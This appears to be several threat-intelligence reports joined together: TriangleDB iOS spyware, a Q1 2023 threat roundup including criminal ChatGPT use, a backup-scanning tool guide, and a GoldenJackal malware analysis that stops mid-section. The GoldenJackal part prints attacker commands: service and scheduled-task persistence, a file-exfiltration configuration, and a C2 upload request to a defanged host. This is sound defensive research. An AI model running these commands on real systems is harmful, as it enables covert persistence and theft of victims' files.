Over the years, there have been multiple cases when iOS devices were infected with targeted spyware such as Pegasus, Predator, Reign and others. Often, the process of infecting a device involves launching a chain of different exploits, e.g. for escaping the iMessage sandbox while processing a malicious attachment, and for getting root privileges through a vulnerability in the kernel. Due to this granularity, discovering one exploit in the chain often does not result in retrieving the rest of the chain and obtaining the final spyware payload. For example, in 2021, analysis of iTunes backups helped to discover an attachment containing the FORCEDENTRY exploit. However, during post-exploitation, the malicious code downloaded a payload from a remote server that was not accessible at the time of analysis. Consequently, the analysts lost “the ability to follow the exploit.”

In researching Operation Triangulation, we set ourselves the goal to retrieve as many parts of the exploitation chain as possible. It took about half a year to accomplish that goal, and, after the collection of the chain had been completed, we started an in-depth analysis of the discovered stages. As of now, we have finished analyzing the spyware implant and are ready to share the details.

The Operation Triangulation infection chain

The implant, which we dubbed TriangleDB, is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability. It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again. In case no reboot occurs, the implant uninstalls itself after 30 days, unless this period is extended by the attackers.

Meet TriangleDB

The TriangleDB implant is coded using Objective-C, a programming language that preserves names of members and methods assigned by the developer. In the implant’s binary, method names are not obfuscated; however, names of class members are uninformative acronyms, which makes it difficult to guess their meaning:

In some cases, it is possible to guess what the acronyms mean. For example, osV is the iOS version, and iME contains the device’s IMEI.

The strings in the implant are HEX-encoded and encrypted with rolling XOR:

id +[CRConfig unmungeHexString:](id a1, SEL a2, id stringToDecrypt) {
  // code omitted
  while (1) {
	hexByte[0] = stringBytes[i];
	hexByte[1] = stringBytes[i + 1];
	encryptedByte = strtoul(hexByte, &__endptr, 16);
	if (__endptr == hexByte) 
          break;
	i += 2LL;
	if (j)
  	    decryptedString[j] = encryptedByte ^ previousByte;
	else
  	    decryptedString[0] = encryptedByte;
	++j;
	previousByte = encryptedByte;
	if (i >= stringLength) 
          break;
  }
  decryptedString[j] = 0;
  // code omitted
}

The rolling XOR algorithm implemented in the implant for string decryption

C2 communications

Once the implant launches, it starts communicating with the C2 server, using the Protobuf library for exchanging data. The configuration of the implant contains two servers: the primary and the fallback (contained in the lS and lSf configuration fields). Normally, the implant uses the primary server, and, in case of an error, it switches to the fallback server by invoking the -[CRConfig swapLpServerType:] method.

Additionally, the sent and received messages are encrypted with symmetric (3DES) and asymmetric (RSA) cryptography. All messages are exchanged via the HTTPS protocol in POST requests, with the cookie having the key g and a value that is a digit string from the pubKI configuration parameter.

The implant periodically sends heartbeat beacons that contain system information, including the implant version, device identifiers (IMEI, MEID, serial number, etc.) and the configuration of the update daemon (whether automatic downloads and installations of updates are enabled).

Heartbeat beacon snippet, implant v1.7.0.5 running on iOS 15.3.1

TriangleDB commands

The C2 server responds to heartbeat messages with commands. Commands are transferred as Protobuf messages that have type names starting with CRX. The meaning of these names is obscure: for example, the command listing directories is called CRXShowTables, and changing C2 server addresses is handled by the command CRXConfigureDBServer. In total, the implant we analyzed has 24 commands designed for:

• Interacting with the filesystem (creation, modification, exfiltration and removal of files);
• Interacting with processes (listing and terminating them);
• Dumping the victim’s keychain items, which can be useful for harvesting victim credentials;
• Monitoring the victim’s geolocation;
• Running additional modules, which are Mach-O executables loaded by the implant. These executables are reflectively loaded, with their binaries stored only in memory.

One of the interesting commands we discovered is called CRXPollRecords. It monitors changes in folders, looking for modified files that have names matching specified regular expressions. Change monitoring is handled by obtaining a Unix file descriptor of the directory and assigning a vnode event handler to it. Whenever the implant gets notified of a change, the event handler searches for modified files that match the regex provided by the attacker. Such files are then scheduled for uploading to the C2 server.

The parameters of this command are as follows:

Below, we describe the implant’s commands, specifying the developer-assigned command names along with their numerical identifiers when possible.

Odd findings

While researching the TriangleDB implant, we found a lot of curious details:

• The developers refer to string decryption as “unmunging” (as the method performing string decryption is named +[CRConfig unmungeHexString:] );
• Throughout the code, we observed that different entities were given names from database terminology, which is the reason why we dubbed the implant TriangleDB:
  

  Entity	Developer-used terminology for the entity
  Directory	Table
  File	Record
  Implant module
  Process	Schema
  Keychain entry	Index, row
  C2 server	DB Server
  Geolocation information	DB Status
  Heartbeat	Diagnostic data
  Process of exchanging data with C2 server	Transaction
  Request to C2 server	Query
  iOS application	Operation

• While analyzing TriangleDB, we found that the class CRConfig (used to store the implant’s configuration) has a method named populateWithFieldsMacOSOnly. This method is not called anywhere in the iOS implant; however, its existence means that macOS devices can also be targeted with a similar implant;
• The implant requests multiple entitlements (permissions) from the operating system. Some of them are not used in the code, such as access to camera, microphone and address book, or interaction with devices via Bluetooth. Thus, functionalities granted by these entitlements may be implemented in modules.

To be continued

That’s it for TriangleDB, a sophisticated implant for iOS containing multiple oddities. We are continuing to analyze the campaign, and will keep you updated with all details about this sophisticated attack.

TriangleDB indicators of compromise

MD5      063db86f015fe99fdd821b251f14446d
SHA-1    1a321b77be6a523ddde4661a5725043aba0f037f
SHA-256  fd9e97cfb55f9cfb5d3e1388f712edd952d902f23a583826ebe55e9e322f730f

• IT threat evolution in Q1 2023
• IT threat evolution in Q1 2023. Non-mobile statistics
• IT threat evolution in Q1 2023. Mobile statistics

Targeted attacks

BlueNoroff introduces new methods bypassing MotW

At the close of 2022, we reported the recent activities of BlueNoroff, a financially motivated threat actor known for stealing cryptocurrency. The threat actor typically exploits Word documents, using shortcut files for the initial intrusion. However, recently the group has adopted new methods to deliver its malware.

One of these, designed to evade the Mark-of-the-Web (MotW) flag, is the use of .ISO (optical disk image) and .VHD (virtual hard disk) file formats. MotW is a Windows security measure — the system displays a warning message when someone tries to open a file downloaded from the internet.

The threat actor also seems to be experimenting with new file types to deliver its malware. We observed a new Visual Basic script, a previously unseen Windows Batch file and a Windows executable.

Our analysis revealed more than 70 domains used by this group, meaning that they were very active until recently. They also created numerous fake domains that look like venture capital and bank domains: most of these imitate Japanese venture capital companies, indicating that the group has an extensive interest in Japanese financial entities.

Roaming Mantis implements new DNS changer

We continue to track the activities of Roaming Mantis (aka Shaoye), a well-established threat actor targeting countries in Asia. From 2019 to 2022, this threat actor mainly used ‘smishing’ to deliver a link to its landing page, with the aim of controlling infected Android devices and stealing device information, including user credentials.

However, in September 2022, we analyzed the new Wroba.o Android malware, used by Roaming Mantis, and discovered a DNS changer function that was implemented to target specific Wi-Fi routers used mainly in South Korea.

This can be used to manage all communications from devices using a compromised Wi-Fi router with the rogue DNS settings — for example, to redirect someone to malicious hosts and interfere with security product updates. People connect infected Android devices to free, public Wi-Fi in such places as cafes, bars, libraries, hotels, shopping malls, and airports. When connected to a targeted Wi-Fi model with vulnerable settings, the malware will compromise the router and affect other devices as well. As a result, it can spread widely in the targeted regions.

BadMagic: new APT related to the Russo-Ukrainian conflict

Since the start of the Russo-Ukrainian conflict, we have identified a significant number of geo-political cyber-attacks, as outlined in our overview of the cyber-attacks related to the conflict.

Last October, we identified an active infection of government, agriculture and transportation organizations located in Donetsk, Lugansk and Crimea. The initial vector of compromise is unclear, but the details of the next stage imply the use of spear-phishing or something similar. The targets navigated to a URL pointing to a ZIP archive hosted on a malicious web server. This archive contained two files: a decoy document (we discovered PDF, XLSX and DOCX versions) and a malicious LNK file with a double extension (e.g. PDF.LNK) which, when opened, results in infection.

In several cases, the contents of the decoy document were directly related to the name of the malicious LNK, to trick the user into activating it

The LNK file downloads and installs a PowerShell backdoor called “PowerMagic”, which in turn deploys a sophisticated modular framework called “CommonMagic”. We discovered CommonMagic plugins capable of stealing files from USB devices as well as taking screenshots and sending them to the threat actor.

During our initial analysis, we were unable to find anything to connect the samples we found and the data used in the campaign to any previously known threat actor. However, our continuing investigations revealed more information about this threat, including links to other APT campaigns. You can find the details here.

Other malware

Prilex targets contactless credit card transactions

Prilex has evolved from ATM-focused malware into the most advance PoS threat we have seen so far. The threat actor goes beyond the old memory scrapers seen in PoS attacks, to highly advanced malware that includes a unique cryptographic scheme, real-time patching of target software, forcing protocol downgrades, manipulating cryptograms, performing so-called “GHOST transactions” and credit card fraud — even on chip-and-PIN cards.

While investigating an incident, we discovered new Prilex samples, and one of the new features included the ability to block contactless transactions. These transactions generate a unique identifier that’s valid for just one transaction, making them worthless to cybercriminals. By blocking the transaction, Prilex tries to force the customer to insert their card to make a chip-and-PIN transaction instead, allowing the cybercriminals to capture data from the card using their standard techniques.

With contactless card transactions increasing, this is a valuable technique that allows the Prilex threat actor to continue stealing card information.

The threat actor uses social engineering to infect a PoS terminal. They try to convince employees of a retail outlet that they urgently need to update the terminal’s software and to allow a “technical specialist” to visit the store, or at least provide remote access to the terminal. It’s important that retail organizations are alert to the signs of infection — including repeated failed contactless transactions — and educate staff about the methods used by cybercriminals to gain entry to their systems.

For retail companies (especially large networks with many branches), it’s important to develop internal regulations and explain to all employees exactly how technical support and/or maintenance crews should operate. This should at least prevent unauthorized access to POS-terminals. In addition, increasing employee’s awareness of the latest cyberthreats is always a good idea: that way they’ll be much less susceptible to new social engineering tricks.

Stealing cryptocurrency using a fake Tor browser

We recently discovered an ongoing cryptocurrency theft campaign affecting more than 15,000 users across 52 countries. The attackers used a technique that has been around for more than a decade and was originally used by banking Trojans to replace bank account numbers. However, in the recent campaign, the attackers used a Trojanized version of the Tor Browser to steal cryptocurrency.

The target downloads the Trojanized version of the Tor Browser from a third-party resource containing a password protected RAR archive — the password is used to prevent it being detected by security solutions. Once the file is dropped onto the target’s computer, it registers itself in the system’s auto-start and masquerades as an icon for a popular application, such as uTorrent.

The malware waits until there is a wallet address in the clipboard and then replaces a portion of the entered clipboard contents with the cybercriminal’s own wallet address.

Our analysis of existing samples suggests that the estimated loss for those targeted in the campaign is at least $400,000, but the actual amount stolen could be much greater, as our research focused only on Tor Browser abuse. Other campaigns may use different software and malware delivery methods, as well as other types of wallets.

We haven’t been able to identify a single web site that hosts the installer, so it is probably distributed either via torrent downloads or some other software downloader. The installers coming from the official Tor Project are digitally signed and didn’t contain any signs of such malware. So, to stay safe, you should download software only from reliable and trusted sources. Even where someone has downloaded the Trojanized version, a good anti-virus product should be able to detect it.

There is also a way to check if your system is compromised with malware of the same class. Put the following “Bitcoin address” into Notepad:
bc1heymalwarehowaboutyoureplacethisaddress

Now press Ctrl+C and Ctrl+V. If the address changes to something else — the system is probably compromised by clipboard-injector malware and is dangerous to use.

We would recommend that you scan your system with security software. If you want to have full confidence that no hidden backdoors remain, once a system has been compromised, you should not trust it until it has been rebuilt.

It seems that everyone’s chatting about ChatGPT

Since OpenAI opened up its large GPT-3 language model to the general public through ChatGPT, interest in the project has soared, as people rushed to explore its possibilities, including writing poetry, engaging in dialogue, providing information, creating content for web sites and more.

There has also been a good deal of discussion about the potential impact of ChatGPT on the threat landscape.

Given ChatGPT’s ability to mimic human interaction, it’s likely that automated spear-phishing attacks using ChatGPT are already taking place. ChatGPT allows attackers to generate persuasive, personalized e-mails on an industrial scale. Moreover, any responses from the target of the phishing message can easily be fed into the chatbot’s model, producing a compelling follow-up in seconds. That said, while ChatGPT may make it easier for cybercriminals to churn out phishing messages, it doesn’t change the nature of this form of attack.

Cybercriminals have also reported on underground hacker forums how they have used ChatGPT to create new Trojans. Since the chatbot is able to write code, if someone describes a desired function (for example, “save all passwords in file X and send via HTTP POST to server Y”), they can create a simple infostealer without having any programming skills. However, such Trojans are likely to be primitive and could contain bugs that make it less effective. For now, at least, chatbots can only compete with novice malware writers.

We also uncovered a malicious campaign that sought to exploit the growing popularity of ChatGPT. Fraudsters created social network groups that mimicked communities of enthusiasts. These groups also contained fake credentials for pre-created accounts that purported to provide access to ChatGPT. The groups contained a plausible link inviting people to download a fake version of ChatGPT for Windows.

The malicious link installs a Trojan that steals account credentials stored in Chrome, Edge, Firefox, Brave and other browsers.

Since security researchers frequently publish reports about threat actors, including TTPs (Tactics, Techniques and Procedures) and other indicators, we decided to try to find out what ChatGPT already knows about threat research and whether it can help common malicious tools and IoCs (Indicators of Compromise), such as malicious hashes and domains.

The responses for host-based artifacts looked promising, so we instructed ChatGPT to write some code to extract various metadata from a test Windows system and then to ask itself whether the metadata was an IoC:

Since certain code snippets were handier than others, we continued developing this proof of concept manually: we filtered the output for events where the ChatGPT response contained a “yes” statement regarding the presence of an IoC, added exception handlers and CSV reports, fixed small bugs and converted the snippets into individual cmdlets, which produced a simple IoC scanner, HuntWithChatGPT.psm1, capable of scanning a remote system via WinRM.

While the exact implementation of IoC scanning may not currently be a very cost-effective solution at $15 to £20 per host for the OpenAI API, it shows interesting interim results, and reveals opportunities for future research and testing.

The impact of AI on our lives will extend far beyond the current capabilities of ChatGPT and other current machine learning projects. Ivan Kwiatkowski, a researcher in our Global Research and Analysis Team, recently explored the likely scope of the changes we can expect in the long term. These perspectives not only include the productivity gains offered by AI, but the social, economic and political implications of the changes it is likely to usher in.

Tracking our digital footprints

We’ve become used to service providers, marketing agencies and analytical companies tracking our mouse clicks, social media posts and browser and streaming services history. Companies do this for a number of reasons. They want to understand our preferences better, and suggest products and services that we’re more likely to buy. They do it to find out which images or text we focus on most. They also sell on our online behavior and preferences to third parties.

The tracking is done using web beacons (aka tracker pixels and spy pixels). The most popular tracking technique is to insert a tiny image –1×1 or even 0x0 pixels in size — into an e-mail, application, or web page. The e-mail client or browser makes a request to download the image from the server by transmitting information about you, which the server records. This includes the time, device, operating system, browser, and the page from which the pixel was downloaded. This is how the operator of the beacon learns that you opened the e-mail or web page, and how. Often a small piece of JavaScript inside the web page, which can collect even more detailed information, is used instead of a pixel. These beacons, placed on every page or application screen, make it possible for companies to follow you wherever you go on the web.

In our recent report on web trackers, we listed the 20 most common beacons found on web sites and in e-mail. The data for web beacons is based on anonymous statistics from the Do Not Track (DNT) component of Kaspersky consumer products, which blocks the loading of web site trackers. Most of the companies have at least some connection to digital advertising and marketing, including tech giants such as Google, Microsoft, Amazon and Oracle.

The data for e-mail beacons is from anonymized anti-spam detection data from Kaspersky mail products. The companies in the list are either e-mail service providers (ESP) or customer relationship management (CRM) companies.

The information collected using trackers is of value not just to legitimate companies, but also to cybercriminals. If they are able to obtain such information — for example, as result of a data leak — they can use it to hack online accounts or send fake e-mails. In addition, attackers make use of web beacons too. You can find information on how to protect yourself from tracking here.

Malvertising through search engines

In recent months, we have observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, abused the search engine promotion plan in order to deliver malicious payloads to victims’ computers.

They seem to be using the same technique of mimicking a web site associated with well-known software, such as Notepad++ and Blender 3D. The threat actors create copies of legitimate software web sites and use “typosquatting” (using incorrectly spelled brands or company names as URLs) or “combosquatting” (as above, but adding arbitrary words as URLs) to make the sites look legitimate. They then pay to promote the site in the search engine in order to push it to the top of search results — a technique known as “malvertising”.

The distribution of malware that we have seen suggests that threat actors are targeting victims, both individual and corporate, across the globe.

In our initial blogpost about “Operation Triangulation”, we published a comprehensive guide on how to manually check iOS device backups for possible indicators of compromise using MVT. This process takes time and requires manual search for several types of indicators. To automate this process, we developed a dedicated utility to scan the backups and run all the checks. For Windows and Linux, this tool can be downloaded as a binary build, and for MacOS it can be simply installed as a Python package.

How to back up your device

Windows

On Windows, the easiest way to do a backup is via iTunes:

1. Connect your device to a computer that has iTunes installed. Unlock your device and, if needed, confirm that you trust your computer.
   

   Window asking to trust the computer

2. Your device should now be displayed in iTunes. Right click on it and press “Back Up”.
   
3. The created backup will be saved to the %appdata%\Apple Computer\MobileSync\Backup directory.

macOS

If your macOS version is lower than Catalina (10.15), you can create a backup using iTunes, using instructions for Windows. Starting from Catalina, backups can be created through Finder:

• Connect your device to the computer and, if needed, confirm that you trust the computer.
• Your device should now be displayed in Finder. Select it and then click “Create a backup“.
• The created backup will be saved to the ~/Library/Application Support/MobileSync/Backup/ directory.

Linux

To create a backup on Linux, you will need to install the libimobiledevice library. In order to create backups of devices with the latest versions of iOS installed, you will need to compile this library from source code (you can find the build instructions in the Installation/Getting Started section).
After you install the library and connect your device to the computer, you can create a backup using the idevicebackup2 backup --full command.
During the backup process, you may need to enter your device passcode multiple times.

How to use our triangle_check utility

After you do a backup of your device using the instructions above, you will need to install and launch our triangle_check utility.

The triangle_check Python package

No matter what operating system you have, you can install the triangle_check Python package that we have published to the Python Package Index (PyPi). To do that, you need to have internet access as well as have the pip utility installed.
You can install the utility using two methods:

• From PyPI (recommended):
  Run the python -m pip install triangle_check command.
• Building from Github:
  Run the following commands:
  git clone https://github.com/KasperskyLab/triangle_check
cd triangle_check
python -m build
python -m pip install dist/triangle_check-1.0-py3-none-any.whl

After installing, you can launch the utility with the following command:
python -m triangle_check path to the created backup.

Binary builds

If you have Windows or Linux, you can also use the binary builds of the triangle_check utility that we have published on GitHub. Follow the instructions below to use it:
Windows

1. Download the triangle_check_win.zip archive from the GitHub releases page and unpack it.
2. Launch the command prompt (cmd.exe) or PowerShell.
3. Change your directory to the one with the unpacked archive (e.g. cd %userprofile%\Downloads\triangle_check_win).
4. Launch triangle_check.exe, specifying the path to the backup as an argument (e.g. triangle_check.exe "%appdata%\Apple Computer\MobileSync\Backup\00008101-000824411441001E-20230530-143718" ).

Linux

1. Download the triangle_check_win.zip archive from the GitHub releases page and unpack it.
2. Launch the terminal.
3. Change your directory to the one with the unpacked archive (e.g. cd ~/Downloads/triangle_check_linux).
4. Allow the utility to be executed with the chmod +x triangle_check command.
5. Launch the utility, specifying the path to the backup as an argument (e.g. ./triangle_check ~/Desktop/my_backup/00008101-000824411441001E-20230530-143718 ).

Interpreting the results

The utility outputs “DETECTED” when it locates specific indicators of compromise, and that would mean that the device was infected.
Also, it may print out “SUSPICION” that would mean that a combination of less specific indicators points to a likely infection. Finally, if the message displayed is “No traces of compromise were identified“, then the utility did not find any signs of ‘Operation Triangulation’ compromise.

GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. Despite the fact that they began their activities years ago, this group is generally unknown and, as far as we know, has not been publicly described.

We started monitoring the group in mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher intended to:

• control victim machines
• spread across systems using removable drives
• exfiltrate certain files from the infected system
• steal credentials
• collect information about the local system
• collect information about users’ web activities
• take screen captures of the desktop

Based on their toolset and the attacker’s behaviour, we believe the actor’s primary motivation is espionage.

Infection vectors

We have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake Skype installers and malicious Word documents.

The fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size. It was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for business standalone installer. This tool was used in 2020.

The other known infection vector was a malicious document that uses the remote template injection technique to download a malicious HTML page, which exploits the Follina vulnerability.

Malicious document – first page

The document was named “Gallery of Officers Who Have Received National And Foreign Awards.docx” and appears as a legitimate circular distributed to collect information about officers decorated by Pakistan’s government. It’s worth noting that the first description of the Follina vulnerability was published on May 29, 2022 and this document appears to have been modified on June 1, two days after publication, and was first detected on June 2.

The document was configured to load an external object from a legitimate and compromised website:

hxxps://www.pak-developers[.]net/internal_data/templates/template.html!

Code snippet used to load the remote resource

The remote webpage is a modified version of a public “Proof of Concept” to exploit the Follina vulnerability. The original PoC is available on GitHub. The attacker replaced the IT_BrowseForFile variable value with the following:

Code snippet used to exploit the Follina vulnerability

The decoded string is:

Decoded script

The exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores it in the following path: “%Temp%\GoogleUpdateSetup.exe”. The downloaded file is the JackalControl malware.

In other cases, we do not have a real infection vector, but we observed a system compromised during lateral movements. Specifically, we observed the attacker using the psexec utility to start a malicious batch script.

cmd /c "c:\windows\temp\install.bat > c:\windows\temp\output.txt"

The batch script performs a variety of actions, such as installing Microsoft .Net Framework 4, infecting the system with the JackalControl Trojan, and collecting information about the system.

$temp\\dnf4.exe /q /norestart
tasklist
sc qc "WEvMngS"
sc stop "WEvMngS"
sc delete "WEvMngS"
sc create "WEvMngS" binpath= "\"$windir\WEvMngS.exe\" /1" displayname= "Windows
Event Manager" type= own start= auto"
sc description "WEvMngS" "Provides event-related methods that register routed
events."
sc start "WEvMngS"
schtasks /delete /f /tn "\Microsoft\Windows\Diagnosis\Event Manager"
schtasks /create /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" /xml
"$temp\\sch.xml" /ru "NT AUTHORITY\SYSTEM"
sc qc "WEvMngS"
schtasks /query /v /fo list /tn "\Microsoft\Windows\Diagnosis\Event Manager"
tasklist
netstat -aon
ping -n 1 google.com
ipconfig /displaydns
netsh winhttp show proxy
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v

JackalControl

This is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and supported commands. These are received via an HTTPS communication channel facilitated between the malware and the C2 servers, and can instruct the implant to conduct any of the following operations:

• Execute an arbitrary program with provided arguments
• Download arbitrary files to the local file system
• Upload arbitrary files from the local file system

During the last few years, the attackers updated this tool multiple times and we observed multiple variants. We are going to describe the latest version, which was observed in January 2023 (8C1070F188AE87FBA1148A3D791F2523).

The Trojan is an executable file that can be started as a standard program or as a Windows service.

It expects an argument, which can be equal to one of the following values:

• /0 : run as a standard program and contacts the C2 servers only once
• /1 : run as a standard program and contacts the C2 servers periodically
• /2 : run as a Windows service

The malware arguments and the related malware behavior change according to the variants. Some variants offer only two arguments:

• /0 run as a standard program
• /1 run as a Windows service

Other variants can install themselves with different persistence mechanisms. The malware’s execution flow is determined by the arguments provided in the command line with which it is run.

• /h0: will cause the malware to gain persistence by creating a Windows scheduled task.
• /h1: will cause the malware to gain persistence by creating a corresponding registry run key.
• /h2: will cause the malware to gain persistence by creating a Windows service.
• /r0: run as standard process (this argument is specified by the Windows scheduled task).
• /r1: run as standard process (this argument is specified by the generated registry run key value).
• /r2: run as a service (this argument is specified by the created Windows service).

Over the years the attackers have distributed different variants: some include code to maintain persistence, others were configured to run without infecting the system; and the infection procedure is usually performed by other components, such as the batch script mentioned above.

The malware starts its activities by generating a BOT_ID that is a unique value used to identify the compromised system. This value is derived from several other host-based values:

The UUID value obtained from the following WMI query:

select * from win32_computersystemproduct

The machine GUID obtained from the following registry key:

select * from win32_computersystemproduct

The list of attached drives, obtained from another WMI query, which in turn allows them to determine the ‘SerialNumber’ of ‘PHYSICALDRIVE0’:

select * from win32_diskdrive

The collected information is concatenated together in a byte array and then hashed with MD5, which is used as a seed for the creation of the BOT_ID. The algorithm used for the generation of the latter simply sums every two consecutive bytes from the resulting MD5 hash and places the resulting byte (modulus 256) as a single byte of the final BOT_ID. This logic is described in the code snippet below, taken from the malware.

Code snippet used to generate the BOT_ID

The resulting BOT_ID is used also to initialize the DES key and IV, which are then used to encrypt communication with the C2.

The malware communicates using HTTP POST requests where data arguments will be carried in encoded form as part of the request’s body. The overall request structure will then appear as follows:

POST /wp-includes/class-wp-network-statistics.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=----2c0272b325864985abf2677460a9b07a
Accept-Language: en-GB,en;q=0.5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Host: finasteridehair[.]com
Content-Length: 154
Expect: 100-continue

------2c0272b325864985abf2677460a9b07a
Content-Disposition: form-data; name="adv"
%ENCODED_DATA%
------2c0272b325864985abf2677460a9b07a

A valid response should in turn be formed in the following way:

<!-- DEBUGDATA::%ENCODED_DATA% -->

The response is decoded with base64: the resulting payload is an array of strings, where the used delimiter is the standard Windows new line sequence – “\r\n”. Each line is decoded again with base64, decrypted with DES, and decompressed with the GZIP algorithm.

Each command has the following structure:

Command structure

The command type must be equal to one of the following codes:

The Command Data field is intended to carry information on the command arguments and has a different structure for each action type, as specified below:

• Execute
  
• Download
  
• Upload
  

The command results are usually composed into a message that also includes the values of the underlying command type and command ID, which uniquely identifies an instance of a command issued to the malware. The three values are compressed with GZIP, encrypted with DES, and encoded with base64.

The resulting payload is concatenated with the BOT_ID using the “|” char, encoded again with base64, after which it gets uploaded to the remote server using the aforementioned POST request format.

Installer mode

Some variants can infect the system, creating a copy of the malware in a specific location and guaranteeing its persistence.

The malware location is selected with a specific procedure. It enumerates all subdirectories in CommonApplicationData and randomly selects one to which its copy will be saved. The generated file name will be suffixed with the subdirectory’s names and appended with another static value, Launcher.exe, as outlined below:

Selected directory: C:\ProgramData\Windows App Certification Kit Launcher
Malware copy: "C:\ProgramData\Windows App Certification Kit
Launcher\WindowsAppCertificationKitLauncher.exe"

If the operation succeeds, it also changes the new file timestamp and makes it the same as that of the selected subdirectory.

If the operation fails, it randomly selects another directory and tries again to copy the malware.

If the operation fails with all subdirectories, it tries to use a list of hard-coded directory names:

• Google
• Viber
• AdGuard
• WinZip
• WinRAR
• Adobe
• CyberLink
• Intel

If all the previous attempts fail, it tries to use the same procedure in the following locations:

• ApplicationData
• LocalApplicationData
• Temp

Persistence

The malware’s persistence is usually guaranteed with one of the following mechanisms:

• Service installation
• Creation of a new Windows registry key value
• Creation of a new scheduled task.

The service is usually installed by the malware with the execution of the Windows sc.exe utility.

sc create "[MALWARE_NAME_NO_EXT]" binpath= "[MALWARE_FULL_PATH]" /[ARGUMENT]"
displayname= "WORKPATH" type= own start= auto
sc description "[MALWARE_NAME_NO_EXT]" "This service keeps your installation up to date with the latest enhancements and security fixes."
sc start "[MALWARE_NAME_NO_EXT]"

The registry value is equal to the copied malware file name, without the extension, and is stored under the following key:

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value name: "[MALWARE_NAME_NO_EXT]"
Value data: "[MALWARE_FULL_PATH] [ARGUMENT]"

The scheduled task is created using a hard-coded XML template that is modified at runtime and dropped in the file system using the same malware file path, but with a different extension, .xml instead of .exe.

The generated XML file is then used with the Windows schtasks.exe utility to create the task.

For example:

schtasks.exe /create /f /tn "Adobe Update" /xml 
"C:\ProgramData\Adobe\adobeupd.xml"

The task and service description change according to the variant.

JackalSteal

JackalSteal is another implant usually deployed on a few compromised machines that is used to find files of interest on the target’s system and exfiltrate them to the C2 server.

This tool can be used to monitor removable USB drives, remote shares, and all logical drives in the targeted system. The malware can work as a standard process or as a service. It cannot maintain persistence, so it must be installed by another component.

JackalSteal starts its execution by parsing the arguments.

These options allow the attacker to specify the ‘profile’, which defines what files are of interest to the attackers. The profile consists of an ID and a list of patterns. Each pattern contains a list of options with the following properties:

The command used to configure the JackalSteal component is as follows:

%TEMP%\\setup01.exe -p all -p usb -e Windows -e \"Program Files*\" -e ProgramData -e 
Users\\*\\AppData -e *\\AppData -s 15 -d 30 -w 3600 -m 
*.doc,*.docx,*.pdf,*.jpg,*.png,*.tif,*.tiff,*.txt,*.ppt,*.pptx,*.xls,*.xlsx -n 48df302a44c392eb

The unique identifier “–n” is usually the same BOT_ID generated by the JackalControl Trojan.

After argument processing, the malware serializes the data in an XML, encrypts them with DES using a key generated from the ID passed with the “-n” option and stores the resulting payload in the following location: “%ApplicationData%\SNMP\cache\%Filename%”, where %Filename% is a GUID generated from an MD5 of the unique identifier specified by the attacker.

The malware is usually executed with the “/0” or “/1” option and the “-n” option, which is used to load the obtained profile ID. In the second case, it loads the profile from the previously mentioned location and it starts the ‘Watchers’.

A Watcher is an object defined in a class with the same name that runs in a different thread and scans the location according to the specified options. The pattern could represent:

• a simple path in the local filesystem;
• a path on a remote share;
• constant string all;
• constant string usb.

When the pattern equals ‘all’, the malware enumerates all logical drives, and for each one it creates a new Watcher object. When the pattern is ‘usb’, it listens for system events corresponding to the action of creating a new removable drive on the system. When a new drive is detected, it creates a new Watcher object.

Every time a new Watcher is added, the malware notifies the log of the event and sends the information to the remote C2 using HTTP Post requests.

The log is created using the following string as a template:

Path: {0}{1}\r\nMasks: {2}\r\nExclude: {3}\r\nDays: {4}\r\nMaxSize: {5}\r\nInterval: {6}

And is uploaded inside an encrypted payload that contains the following information:

|<AES_Key,AES_IV><Agent_id\\%yyyyMMddHHmmssfff%.log><Log content>|

The AES_Key and AES_IV are generated for each request and are encrypted with the RSA algorithm using a key embedded in the code. The resulting payload is also compressed with the GZIP algorithm.

The Agent_id\\Log_path.log and the Log content data are encrypted with the AES algorithm and compressed with GZIP.

The Watcher objects are responsible for scanning activities. When a Watcher starts, it enumerates all files in the directory and its subdirectories. The scanner can also resolve the .lnk links. When the scanner detects a file that matches the defined properties (mask, days, max size, not in exclusions), it calculates the file content hash, checks if the resulting value is present in a hash table stored in the local cache directory and adds the value if not present. When a new file is detected, the malware uploads the file and the related filepath inside an encrypted payload using the same logic described above.

In this case, the encrypted payload contains the following information:

|<AES_Key,AES_IV><Agent_id\\Local_file_path><File content>|

The Agent_id\\Local_file_path and the File content data are encrypted with the AES algorithm and compressed with GZIP.

JackalWorm

This worm was developed to spread and infect systems using removable USB drives. The program was designed as a flexible tool that can be used to infect systems with any malware.

Its behavior changes according to the parent process.

When the malware is working on a system that is already infected and the parent process is taskeng.exe or services.exe:

1. Monitors removable USB drives
2. When a device is attached, hides the last-modified directory and replaces it with a copy of the worm

The code used to monitor removable USB drives is the same one observed in JackalSteal. It creates a ManagementEventWatcher object, which allows it to subscribe to event notifications that correspond to a given WQL query and the issuing of a callback upon their interception. The query used by the malware instructs the system to check for a logical removable disk creation event every five seconds:

select * from __InstanceCreationEvent within 5 where TargetInstance ISA 
'Win32_LogicalDisk' and TargetInstance.DriveType = 2

